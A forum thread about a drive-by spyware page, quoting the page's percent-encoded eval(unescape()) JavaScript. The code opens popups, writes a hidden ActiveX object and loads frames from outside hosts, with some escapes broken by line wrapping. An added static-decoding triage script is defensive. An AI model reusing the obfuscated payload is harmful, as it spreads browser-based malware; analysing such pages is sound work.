Gah! Beware of WINHOUND, new spyware

IE6.

If you google winhood and search deeply (I don't care to again) there are a couple malware sites that explain what it is a bit deeper. It's fairly new, out within the past 2 weeks.
 
hmm, anyone want to look at the page source and see what it is trying to do? Unless there is an unpatched vulnerability in your browser, it should be impossible for something to come in, that said I don't want to try it!
 
Not trying to turn this into a software forum thread, but the merits of using a browser simply because it's not by far the most popular one are more than enough to warrant doing so.
 
src:

<html>
<head>
<SCRIPT language=JavaScript TYPE="text/javascript">
<!--
eval(unescape("%76%61%72%20%65%66%3d%30%3b%76%61%72%20%74%6f%64%61%79%44%61%74%
5%3d%6e%65%77%20%44%61%74%65%28%29%3b%74%6f%64%61%79%44%61%74%65%2e%73%65%74%44
61%74%65%28%74%6f%64%61%79%44%61%74%65%2e%67%65%74%44%61%74%65%28%29%2b%31%29%3
%6e%44%61%74%61%3d%74%6f%64%61%79%44%61%74%65%2e%74%6f%47%4d%54%53%74%72%69%6e%
7%28%29%3b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%20%3d%20%27%48%35%55%35
52%76%7a%4d%3d%32%38%31%32%39%3b%20%65%78%70%69%72%65%73%3d%27%2b%6e%44%61%74%6
%2b%27%3b%27%3b%20%76%61%72%20%45%78%5f%70%70%3d%27%68%74%74%70%3a%2f%2f%76%69%
4%65%6f%78%79%7a%2e%63%6f%6d%2f%70%6f%70%75%70%2e%70%68%70%27%3b%20%76%61%72%20
55%73%65%5f%6f%62%6a%3d%66%61%6c%73%65%3b%20%76%61%72%20%70%70%5f%6f%62%6a%3d%6
%68%5f%76%65%72%28%29%3b%20%66%75%6e%63%74%69%6f%6e%20%73%65%6c%5f%70%70%28%75%
2%6c%29%7b%20%75%72%6c%3d%45%78%5f%70%70%3b%20%69%66%20%28%70%70%5f%6f%62%6a%29
7b%20%68%5f%70%70%28%75%72%6c%29%3b%20%7d%20%65%6c%73%65%20%7b%20%75%5f%70%70%2
%75%72%6c%29%3b%20%7d%7d%20%66%75%6e%63%74%69%6f%6e%20%68%5f%70%70%28%75%72%6c%
9%7b%20%20%69%66%20%28%55%73%65%5f%6f%62%6a%29%7b%20%20%68%5f%70%70%28%27%22%2b
75%72%6c%2b%22%27%29%3b%20%20%72%65%74%75%72%6e%3b%20%7d%20%55%73%65%5f%6f%62%6
%3d%74%72%75%65%3b%20%74%72%79%20%7b%20%70%70%5f%6f%62%6a%2e%6c%61%75%6e%63%68%
5%52%4c%28%75%72%6c%29%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%75%5f%70%70
28%75%72%6c%29%3b%20%7d%20%55%73%65%5f%6f%62%6a%3d%66%61%6c%73%65%3b%7d%20%66%7
%6e%63%74%69%6f%6e%20%75%5f%70%70%28%75%72%6c%29%7b%20%74%72%79%7b%20%20%65%76%
1%6c%28%22%77%69%6e%64%22%2b%22%6f%77%2e%6f%70%22%2b%22%65%6e%28%27%22%2b%75%72
6c%2b%22%27%2c%27%5f%62%6c%22%2b%22%61%6e%6b%27%29%3b%22%29%3b%20%7d%20%63%61%7
%63%68%28%65%29%20%7b%20%20%77%69%6e%64%6f%77%2e%6f%70%65%6e%28%75%72%6c%2c%27%
f%62%6c%61%6e%6b%27%29%3b%20%7d%7d%20%66%75%6e%63%74%69%6f%6e%20%63%68%5f%76%65
72%28%29%7b%20%69%66%20%28%20%77%69%6e%64%6f%77%2e%6f%70%65%72%61%20%29%20%72%6
%74%75%72%6e%3b%20%69%66%20%28%77%69%6e%64%6f%77%2e%6e%61%76%69%67%61%74%6f%72%
e%75%73%65%72%41%67%65%6e%74%2e%69%6e%64%65%78%4f%66%28%22%4d%53%49%45%22%29%20
3d%3d%20%2d%31%29%20%72%65%74%75%72%6e%3b%20%69%66%20%28%77%69%6e%64%6f%77%2e%6
%61%76%69%67%61%74%6f%72%2e%75%73%65%72%41%67%65%6e%74%2e%69%6e%64%65%78%4f%66%
8%22%53%56%31%22%29%20%3d%3d%20%2d%31%29%20%72%65%74%75%72%6e%3b%20%76%61%72%20
71%3d%22%3c%6f%62%22%3b%20%71%2b%3d%22%6a%65%63%74%20%69%64%3d%27%61%6c%75%27%2
%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%63%6c%61%73%73%69%64%3d%27%
3%22%3b%20%71%2b%3d%22%4c%53%49%44%3a%36%42%46%35%32%41%35%32%2d%33%39%34%41%2d
31%31%22%3b%20%71%2b%3d%22%44%33%2d%42%31%35%33%2d%30%30%43%30%34%46%37%39%46%4
%41%36%27%3e%3c%2f%6f%62%22%3b%20%71%2b%3d%22%6a%65%63%74%3e%22%3b%20%20%64%6f%
3%75%6d%65%6e%74%2e%77%72%69%74%65%28%71%29%3b%20%72%65%74%75%72%6e%20%64%6f%63
75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%61%6c%75%27%2
%3b%7d%20%6f%6e%62%65%66%6f%72%65%75%6e%6c%6f%61%64%3d%73%65%6c%5f%70%70%3b")); //-->
</SCRIPT>
</head>
<SCRIPT language=JavaScript TYPE="text/javascript">
<!--
window.document.open();
window.document.write("<frameset rows='*,0,0,0,0' cols='*' frameborder=0>");
window.document.write("<frame name=mainframe src='http://www.searchadv.com/search.php?aid...id=kuxnja&q=andrew%20mahler%20michigan' frameborder=0 noresize>");
eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%32%30%39%2e%36%36%2e%31%32%32%2e%34%39%2f%63%6e%74%2f%70%72%6f%63%65%73%73%6f%72%3f%61%72%61%6c%65%6c%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6e%6f%72%65%73%69%7a%65%3e%3c%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6c%65%61%6e%63%68%61%69%6e%2e%6e%65%74%2f%66%72%2f%3f%69%64%3d%75%73%32%34%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6e%6f%72%65%73%69%7a%65%3e%3c%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%66%75%6c%6c%63%68%61%69%6e%2e%6e%65%74%2f%66%72%2f%3f%69%64%3d%75%73%32%34%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6e%6f%72%65%73%69%7a%65%3e%27%29%3b")); window.document.write("</frameset>");
window.document.close();
//-->
</SCRIPT>
</html>
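
One way to see what a page like this is trying to do without loading it in a browser (an added example, not part of the original thread): statically decode each `eval(unescape("%xx..."))` literal instead of executing it, count escapes broken by a wrapped or truncated paste, and list defanged URLs and notable behaviours. The sample page, the `ads.example.test` host and all function names are constructed for illustration.

```javascript
// Static triage of eval(unescape("%xx...")) pages: decode, never execute.

// Decode %xx pairs. Malformed escapes (e.g. split by a wrapped paste) stay
// literal, as unescape() would leave them, and are counted.
function decodePercentHex(blob) {
  const malformed = (blob.match(/%(?![0-9a-fA-F]{2})/g) || []).length;
  const text = blob.replace(/%([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  return { text, malformed };
}

// Find each eval(unescape("...")) literal; whitespace inside the literal is
// treated as paste wrapping and dropped (real spaces are encoded as %20).
function extractPayloads(source) {
  const re = /eval\s*\(\s*unescape\s*\(\s*(["'])([\s\S]*?)\1\s*\)\s*\)/g;
  return [...source.matchAll(re)].map(m => decodePercentHex(m[2].replace(/\s+/g, "")));
}

// Pull URLs from decoded text and defang them for safe sharing in a report.
function extractUrls(text) {
  const urls = text.match(/https?:\/\/[^\s'"<>)]+/g) || [];
  return urls.map(u => u.replace(/^http/, "hxxp").replace(/\./g, "[.]"));
}

// Behaviours worth flagging in a decoded layer.
const INDICATORS = {
  frameInjection: /<i?frame\b/i,
  activeXObject: /classid\s*=/i,
  popup: /window\.open|onbeforeunload/i,
  cookieWrite: /document\.cookie\s*=/i,
};
function triage(source) {
  return extractPayloads(source).map(({ text, malformed }) => ({
    malformed,
    urls: extractUrls(text),
    flags: Object.keys(INDICATORS).filter(k => INDICATORS[k].test(text)),
    text,
  }));
}

// Constructed sample (placeholder host): a harmless script encoded the same
// way, plus a second payload whose escape was split across a line break.
const encode = s => [...s].map(c => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const SAMPLE_PAGE =
  '<script>eval(unescape("' +
  encode("document.write('<frame src=\"http://ads.example.test/fr/?id=1\">');") +
  '"));</script>\n<script>eval(unescape("%76%61%72%20%78%3d%\n5%3b"));</script>';

for (const r of triage(SAMPLE_PAGE)) console.log(r.malformed, r.flags, r.urls);
```

A non-zero `malformed` count means the decoded text has gaps, so treat its URL list as incomplete and go back to the raw response for a full copy.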
 
I just cleaned this crap off my nephew's computer. Said he didn't click anything, but who knows.
 
I just cleaned this off my friend's computer today. I tried deleting the folder/registry keys, not allowed. Used HijackThis to remove it and then I was able to delete the registry entries.
 
I never clicked anything, a bad day was made wayyy worse with this crappy virus. I found out that person, umm #5 in a two year span has committed suicide tonight.

I was leaving a message on a guestbook and saw an old friend too. I then tried to google him, trying to get an e-mail, ran through the pages and got to the last link, freaked out when browsers started popping open. I tried to get them all closed down and boom, virus had hit. Lucky was home thank God to salvage my pc after a few hours. YUCK!!

May you now rest in eternal peace BPR.
 
ok, so if a search result's text has seemingly noncoherent babble, don't click on it. you won't be spared even if you click on the cached versions (while using IE). they're all keyword pool sites that toss together random words in hopes that you run a search and click on their result.
 
i wonder what programmer in their sick mind would make spyware, they should have their fingers cut off and exiled somewhere in some island like LOST without access to any computers or electronic equipment
 
Originally posted by: EKKC
i wonder what programmer in their sick mind would make spyware, they should have their fingers cut off and exiled somewhere in some island like LOST without access to any computers or electronic equipment

People like you would deprive the world of people like Kevin Mitnick?
 
If you use Firefox, you can see two programs try to run. One is gdnUS2161.exe from 85.255.115.226 and the other is zuz00.exe from content-loader.com.
 
Originally posted by: Pocahontas
I never clicked anything, a bad day was made wayyy worse with this crappy virus. I found out that person, umm #5 in a two year span has committed suicide tonight.

I was leaving a message on a guestbook and saw an old friend too. I then tried to google him, trying to get an e-mail, ran through the pages and got to the last link, freaked out when browsers started popping open. I tried to get them all closed down and boom, virus had hit. Lucky was home thank God to salvage my pc after a few hours. YUCK!!

May you now rest in eternal peace BPR.

First, I'm sorry to hear of this misfortune wrt the suicides.

Then I wonder what avenue this gets in by. Supposedly nothing can get in automatically if a person is up to date on their patches and has not lowered any security settings...
 
Originally posted by: ribbon13
Originally posted by: EKKC
i wonder what programmer in their sick mind would make spyware, they should have their fingers cut off and exiled somewhere in some island like LOST without access to any computers or electronic equipment

People like you would deprive the world of people like Kevin Mitnick?
what has mitnick ever done for the world?
 
Correct me if I'm wrong but that IE6 hole that allows executables to be run through some Javascript exploit, is still unpatched isn't it?
 